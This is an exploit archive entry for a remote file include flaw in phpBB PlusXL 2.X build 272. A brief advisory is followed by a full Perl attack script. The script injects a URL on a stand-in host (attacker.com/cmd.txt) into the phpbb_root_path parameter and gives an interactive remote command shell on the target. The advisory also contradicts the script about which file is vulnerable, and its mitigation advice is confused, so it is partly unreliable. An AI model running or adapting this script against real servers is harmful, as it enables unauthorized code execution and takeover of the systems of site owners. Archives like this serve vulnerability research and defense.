phpBB PlusXL 2.X Remote File Include Vulnerability

vendor:

phpBB PlusXL

by:

hkicken

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpBB PlusXL

Affected Version From: 2.X biuld 272

Affected Version To: 2.X biuld 272

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpBB PlusXL 2.X Remote File Include Vulnerability

A remote file include vulnerability exists in phpBB PlusXL 2.X biuld 272. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. The vulnerability is due to the 'includes/functions.php' script not properly sanitizing user-supplied input to the 'phpbb_root_path' parameter. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL in the 'phpbb_root_path' parameter.

Mitigation:

Upgrade to the latest version of phpBB PlusXL 2.X biuld 272 or apply the patch from the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl
 
#####################################################################################################
#                                                                                                   #
# phpBB PlusXL 2.X biuld 272                                                                        #
#                                                                                                   #
# Class:  Remote File Include Vulnerability                                                         #
#                                                                                                   #
# Patch:  unavailable                                                                               #
#                                                                                                   #
# Date:   2006/10/12                                                                                #
#                                                                                                   #
# Remote: Yes                                                                                       #
#                                                                                                   #
# Type:   high                                                                                      #
#                                                                                                   #
# Site:   http://www.xs4all.nl/~hkicken/plusxl.htm                                                  #
#                                                                                                   #
#####################################################################################################


use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt";   # <====== Change This Line With Your Personal Script

print "\n";
print "##########################################################################\n";
print "#                                                                        #\n";
print "# phpBB PlusXL 2.x <= biuld 272    Remote File Include Vulnerability     #\n";
print "# Bug found By : Ashiyane Corporation                                    #\n";
print "# Email: nima salehi    nima[at]ashiyane.ir                              #\n";
print "# Web Site : www.Ashiyane.ir                                             #\n";
print "#                                                                        #\n";
print "##########################################################################\n";


if (@ARGV < 2)
{
    print "\n Usage: Ashiyane.pl [host] [path] ";
    print "\n EX : Ashiyane.pl www.victim.com /plusxl20/  \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];
$vul="mods/iai/includes/constants.php?phpbb_root_path="

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "<Shell> ";
    $cmd = <STDIN>;
}

# milw0rm.com [2006-10-13]